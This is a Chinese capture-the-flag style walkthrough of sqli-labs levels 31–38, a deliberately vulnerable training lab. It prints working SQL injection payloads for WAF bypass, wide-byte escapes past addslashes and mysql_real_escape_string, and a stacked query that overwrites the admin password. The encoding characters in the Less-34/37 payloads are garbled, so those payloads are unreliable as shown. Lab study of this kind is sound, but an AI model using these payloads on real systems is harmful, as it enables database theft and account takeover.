Sqli-labs Advanced Injections(31-38)

Less-31 FUN with WAF

与之前的区别在于闭合方式变为了(””),直接构造payload:

http://localhost:8080/sqli-labs-master/Less-31/?id=8&id=8") and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()--%20

Less-32 Bypass custom filter adding slashes to dangerous chars

单引号型语句,但是单引号被转义了
查看源码,发现过滤了/,’,” 这三个字符

考虑宽字节注入
构造payload:

http://localhost/sqli-labs-master/Less-32/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-33 Bypass addslashes()

相对于32,源码中可以发现运用addslashes()函数进行过滤

同理构造payload:

http://localhost/sqli-labs-master/Less-33/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-34- Bypass Add SLASHES

post型注入,同样对’进行了转义过滤
为了方便,这里通过插件传参
利用utf-8转换为utf-16或utf-32,
比如可以将 ‘ 转为utf-16为�’,突破成功
payload:

uname=admin�' and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),database() -- &passwd=123&submit=Submit

Less-35 why care for addslashes()

与less-33相比,闭合语句变为

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

构造payload:

http://localhost/sqli-labs-master/Less-35/?id=1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-36 Bypass MySQL Real Escape String

用到一个函数mysql_real_escape_string()

由于数据库没有设置gbk格式,依旧可以通过%df%27突破
构造payload:

http://localhost/sqli-labs-master/Less-36/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-37- MySQL_real_escape_string

less-36的post型,原理与less-34相同
payload:

uname=admin�' and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),database() -- &passwd=123&submit=Submit

Less-38 stacked Query

涉及堆叠查询(Stacked Query
后台使用mysqli_multi_query(),可以进行堆叠注入

取数据payload:

http://localhost/sqli-labs-master/Less-38/?id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20


修改密码payload:

http://localhost/sqli-labs-master/Less-38/?id=8';update users set password='12345' where username='admin';--%20


由于是先查询后更改密码,再提交一次即可看到更改后的密码